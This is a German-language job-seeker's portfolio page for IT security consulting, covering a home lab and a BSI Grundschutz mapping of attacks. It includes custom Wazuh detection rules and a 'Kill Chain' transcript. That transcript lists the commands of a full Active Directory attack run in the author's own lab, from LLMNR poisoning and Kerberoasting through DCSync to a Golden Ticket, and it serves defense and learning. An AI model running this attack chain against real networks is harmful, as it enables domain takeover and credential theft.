Suche Praktikum: IT-Sicherheitsberatung / Compliance ab Sep 2026

André-Michele Joannou

Angriffe verstehen. Unternehmen schützen.

Hamburg // Fachinformatiker für Daten- und Prozessanalyse i.A.

8
MITRE Techniken
5
Custom Wazuh Rules
10
VLANs
1,0
Alle Modulnoten
LinkedIn-Profil Executive Summary (PDF) Mehr erfahren
// Profil

Vom Angriff zur Schutzmaßnahme

Eigentlich wollte ich nur für den CCNA lernen. Dafür habe ich mir Cisco-Hardware gekauft und ein Lab aufgebaut. Dann dachte ich: Wenn ich schon Netzwerke baue, kann ich auch testen, ob sie sicher sind.

Also habe ich eine Active-Directory-Umgebung aufgesetzt, Angriffe durchgeführt — und dabei etwas Entscheidendes gelernt: Jeder erfolgreiche Angriff macht eine fehlende Schutzmaßnahme sichtbar. LLMNR Poisoning funktioniert? BSI APP.2.2.A10 fordert sicheren DNS-Einsatz im AD. Kerberoasting liefert einen Hash? BSI ORP.4.A22 regelt die Passwortqualität.

Das hat meinen Fokus verschoben: Weg vom reinen Pentesting, hin zur IT-Sicherheitsberatung. Angriffe zu verstehen ist das Werkzeug — Unternehmen systematisch zu schützen ist das Ziel. Parallel habe ich eine Compliance-Plattform gebaut (it-sicherheitskompass.de), die 15 Standards abdeckt: NIS2, BSI Grundschutz, ISO 27001, DSGVO und mehr.

Quick Facts

  • Fachinformatiker i.A. (BBQ Hamburg)
  • Modulnoten: 1,0 (alle)
  • LPI Linux Essentials 780/800
  • CCNA-Prüfung: 24.03.2026
  • Python, Java (Grundkenntnisse)
  • 18 Jahre Berufserfahrung
  • Standort: Hamburg
// Über mich

Quereinsteiger mit System

MJ
18 Jahre Spedition und Logistik — davon mehrfach in Führungspositionen. Disposition von bis zu 70 Fahrzeugen täglich unter Zeitdruck, internationale Koordination, Teamleitung. Irgendwann war die Herausforderung weg.

Mit 41 habe ich mich für einen Neuanfang entschieden: Umschulung zum Fachinformatiker für Daten- und Prozessanalyse. Was als Interesse an Netzwerken begann, wurde durch mein HomeLab zur Überzeugung: IT-Sicherheitsberatung ist das, was ich machen will.

Warum Logistik → IT-Sicherheitsberatung kein Bruch ist:

Schulungen: Ich habe selbst eine Schulungsmaßnahme für Werkstattabläufe konzipiert und durchgeführt — vom Konzept bis zur Durchführung. Das ist Security Awareness Training, nur in einem anderen Kontext.

Audits: Fahrer-Audits zur Einhaltung von Sicherheitsvorschriften gehörten zu meinem Alltag. Prüfen, ob Regeln eingehalten werden, Abweichungen dokumentieren, Maßnahmen einleiten — das ist ein IT-Sicherheitsaudit.

Compliance: ADR-Gefahrgut, Zollvorschriften, Temperaturketten bei DACHSER Food Logistics — ich habe jahrelang in regulierten Umgebungen gearbeitet. BSI-Grundschutz ist ein anderes Regelwerk, aber das Prinzip ist identisch.

Incident Response: LKW fällt mit verderblicher Ware aus? Triagieren, eskalieren, kommunizieren, lösen. Das ist Incident Response — nur mit Kühlketten statt Firewalls.

// Angriff = Schutzmaßnahme

BSI-Grundschutz-Mapping

Jede durchgeführte Technik wird einer konkreten BSI-Maßnahme zugeordnet — das ist der Kern meiner Arbeit.

T1558.003

Kerberoasting

BSI ORP.4.A22: Regelung zur Passwortqualität (Service Accounts)

T1557.001

LLMNR Poisoning

BSI APP.2.2.A10: Sicherer Einsatz von DNS für Active Directory

T1053.005

Scheduled Task

BSI NET.1.1.A4: Netztrennung in Zonen

T1003.006

DCSync

BSI ORP.4.A2: Einrichtung, Änderung und Entzug von Berechtigungen

T1558.004

AS-REP Roasting

BSI APP.2.2.A9: Schutz der Authentisierung (Kerberos Pre-Authentication)

T1087

Account Discovery (BloodHound)

BSI OPS.1.1.5.A3: Konfiguration der Protokollierung auf System- und Netzebene

T1558.001

Golden Ticket

BSI APP.2.2.A15: Trennung von Administrations- und Produktionsumgebung

T1047

WMI Execution

BSI SYS.2.2.3.A18: Einsatz der Windows-Remoteunterstützung einschränken

BloodHound CE: Attack Path von SVC_SQL über GenericAll zu Domain Admin
BloodHound CE Attack Path: SVC_SQL → GenericAll → ADMIN.MILLER → DOMÄNEN-ADMINS
// Eigenentwicklungen

Projekte

IT-Sicherheitskompass.de

Compliance-Plattform mit Schnellchecks und Gap-Analysen für 15 Standards (NIS2, DSGVO, ISO 27001, BSI Grundschutz, DORA, KRITIS, NIST CSF u.v.m.). PDF-Reports mit Roadmaps, Kostenschätzungen und priorisierten Handlungsempfehlungen. Kostenlos, anonym, alle Daten lokal im Browser.

Live ansehen →
TypeScript React Next.js

CCNA Übungs-App

Desktop-Lern-App zur CCNA 200-301 Vorbereitung. Interaktive Fragen zu Subnetting, Routing, VLANs, STP und OSPF.

TypeScript React Tauri

SSH Terminal Manager

CLI-basierter SSH-Verbindungsmanager mit verschlüsselter Credential-Speicherung für die sichere Verwaltung von Lab-Zugängen.

Python Paramiko Fernet
// Hardware & Software

HomeLab-Infrastruktur

Enterprise-Umgebung im eigenen 19" Server-Rack (Digitus 12HE)

19-Zoll Server-Rack: Raspberry Pi 5, UGreen DH2300 NAS, Vodafone Station, MinisForum MS-01, GMKtec, Cisco 2960XR, 1941/K9, WS-C2960G
Server-Rack Digitus 12HE — oben: Raspberry Pi 5 (Intenso PDU) · Mitte: UGreen DH2300 NAS, Vodafone Station, MS-01, GMKtec · darunter: Cisco 2960XR Core Switch · Cisco 1941/K9 CCNA-Lab Router · Cisco WS-C2960G Lab Switch

Hardware & Netzwerk

  • Proxmox HA-Cluster: MS-01 (i5-12600H, 32GB) + GMKtec M5 Ultra (Ryzen 7, 64GB)
  • UGreen DH2300 NAS als QDevice (Quorum/Ausfallsicherheit)
  • OPNsense Firewall mit Suricata IDS/IPS
  • Cisco Catalyst 2960XR-24TS-I (Core Switch, DHCP Snooping, Rapid PVST)
  • Cisco ISR 1100 C1111-4P (durch OPNsense auf MS-01 ersetzt, CCNA-Lab)
  • Cisco WS-C2960G + 1941/K9 (CCNA-Lab)
  • TP-Link TL-SG105E (Port-Mirroring/SPAN)
  • UniFi U6+ Access Point
  • Raspberry Pi 5 (Honeypot/WLAN-Target)
  • 10 VLANs (Netzwerksegmentierung)

Security & Monitoring

  • Wazuh SIEM (5 Custom Detection Rules)
  • Authentik SSO/IAM (OIDC)
  • Grafana + Prometheus Monitoring
  • AdGuard DNS
  • Nginx Proxy Manager
  • Guacamole (Remote Desktop Gateway)
  • Cloudflare Tunnel + 2FA

Active Directory Lab

  • Windows Server DC01 (Domain Controller)
  • Windows 10 Clients (PC01 + PC02)
  • Kali Linux (Attacker VM)
  • Vulnerable AD-Konfiguration (gezielt)

Web Application Targets

  • Metasploitable (Exploit-Entwicklung)
  • DVWA (SQL Injection, XSS, CSRF)
  • OWASP Juice Shop (OWASP Top 10)
  • Ubuntu Server (Privilege Escalation)
// Technischer Tiefgang

Kill Chain

Die Angriffskette, die mich zur Compliance gebracht hat — jeder Schritt hat eine Schutzmaßnahme sichtbar gemacht.

kali@homelab:~/attacks$
$ responder -I eth0
[*] LLMNR Poisoning → NetNTLMv2 hash captured
 
$ impacket-GetNPUsers lab.local/ -usersfile users.txt
[*] AS-REP Roasting → tom.jones hash captured
 
$ impacket-GetUserSPNs lab.local/tom.jones -request
[*] Kerberoasting → svc_sql hash captured
 
$ bloodhound-python -c All -d lab.local # BloodHound Python Ingestor
[*] BloodHound CE → Attack Path visualisiert: GenericAll on admin.miller
 
$ impacket-GetUserSPNs lab.local/tom.jones -request-user admin.miller
[*] Targeted Kerberoasting → admin.miller hash cracked
 
$ crackmapexec smb dc01 -u admin.miller -p [REDACTED]
[+] lab.local\admin.miller (Pwn3d!)
 
$ impacket-atexec lab.local/admin.miller@PC01 whoami
[*] Lateral Movement → nt authority\system
 
$ impacket-secretsdump -just-dc admin.miller@dc01
[*] DCSync → All domain hashes + krbtgt
 
$ impacket-ticketer -nthash [REDACTED] -domain lab.local Administrator
[*] Golden Ticket → Persistent domain access without password
 
[!] Wazuh SIEM: 5 Custom Detection Rules triggered — DCSync, WMI, Kerberoasting, AS-REP, Scheduled Task
DCSync: impacket-secretsdump dumpt alle Domain-Hashes inkl. krbtgt
DCSync (T1003.006) impacket-secretsdump — alle Domain-Hashes inkl. krbtgt
Wireshark: SMB2 und DCE/RPC Traffic via SPAN Port-Mirroring
Wireshark SPAN SMB2 + DCE/RPC Traffic via Port-Mirroring (Cisco 2960XR)
// Custom Wazuh SIEM Rules

Detection Engineering

5 selbst geschriebene Detection Rules, die spezifische Angriffsmuster anhand von Windows Event IDs erkennen.

Rule Level Event ID MITRE Detection-Logik
100100 12 4769 T1558.003 RC4-Encryption bei TGS-Request (Kerberoasting)
100101 10 4768 T1558.004 PreAuth-Type = 0 (AS-REP Roasting)
100102 12 4698 T1053.005 Remote Scheduled Task Creation (Lateral Movement)
100103 14 4662 T1003.006 DS-Replication-Get-Changes GUIDs (DCSync)
100104 12 4688 T1047 Parent Process = wmiprvse.exe (WMI Execution)
Iterativer Ansatz: Als ich von atexec auf wmiexec wechselte, war ich wieder unsichtbar. Jede Rule erkennt ein spezifisches Verhaltensmuster (IOC) — wechselt der Angreifer das Tool, wird eine neue Rule nötig. Detection Engineering ist kein Zustand, sondern ein Prozess.
Wazuh SIEM Dashboard: DCSync Detection Rules feuern
Wazuh SIEM Custom Rule 100103 erkennt DCSync — Directory Replication Request by admin.miller
// Qualifikationen

Zertifikate

// Dezember 2025 — Februar 2026

Projektverlauf

Phase 1–3 // Dez 2025 – Jan 2026
Infrastruktur
Proxmox HA-Cluster, OPNsense Firewall, VLANs, Wazuh SIEM, Authentik SSO
Phase 4 // Jan 2026
Active Directory Pentesting
Kerberoasting, AS-REP Roasting, BloodHound, Domain Compromise
Phase 5 // Jan – Feb 2026
Network Attacks & Lateral Movement
LLMNR Poisoning, Lateral Movement (atexec), Wireshark SPAN-Analyse
Phase 6 // Feb 2026
Persistence & Detection Engineering
DCSync, Golden Ticket, WMI Execution, Custom Wazuh Rules 100103–100104
Phase 7 // Feb 2026
Dokumentation & Bewerbung
Portfolio-Website, Executive Summary, LinkedIn-Serie (9 Posts), BSI-Grundschutz-Mapping
// Kontakt

Interesse geweckt?

Ich freue mich auf ein Gespräch — und bringe gerne mein HomeLab-Portfolio mit.

E-Mail michele.joannou@web.de LinkedIn Nachricht schreiben IT-Sicherheitskompass Compliance-Plattform ansehen

Impressum

Angaben gemäß § 5 TMG:
André-Michele Joannou
Hamburg

Kontakt:
E-Mail: michele.joannou [at] web.de

Verantwortlich für den Inhalt nach § 55 Abs. 2 RStV:
André-Michele Joannou, Hamburg

Datenschutzerklärung

1. Verantwortlicher
André-Michele Joannou, Hamburg.
E-Mail: michele.joannou [at] web.de

2. Hosting
Diese Website wird über Cloudflare Pages (Cloudflare, Inc., 101 Townsend St, San Francisco, CA 94107, USA) gehostet. Cloudflare verarbeitet technisch notwendige Verbindungsdaten (IP-Adresse, Zeitpunkt des Zugriffs) zur Auslieferung der Website. Rechtsgrundlage: Art. 6 Abs. 1 lit. f DSGVO (berechtigtes Interesse an der Bereitstellung der Website). Cloudflare ist unter dem EU-US Data Privacy Framework zertifiziert.

3. Keine Cookies, kein Tracking
Diese Website setzt keine Cookies, verwendet keine Analyse- oder Tracking-Tools und lädt keine externen Schriftarten oder Ressourcen von Drittanbietern nach.

4. Externe Links
Diese Website enthält Links zu externen Seiten (LinkedIn, IT-Sicherheitskompass.de). Für deren Datenschutz sind die jeweiligen Betreiber verantwortlich.

5. Ihre Rechte
Sie haben das Recht auf Auskunft (Art. 15 DSGVO), Berichtigung (Art. 16), Löschung (Art. 17), Einschränkung der Verarbeitung (Art. 18), Datenübertragbarkeit (Art. 20) und Widerspruch (Art. 21). Beschwerden können Sie an die zuständige Aufsichtsbehörde richten: Der Hamburgische Beauftragte für Datenschutz und Informationsfreiheit, Ludwig-Erhard-Str. 22, 20459 Hamburg.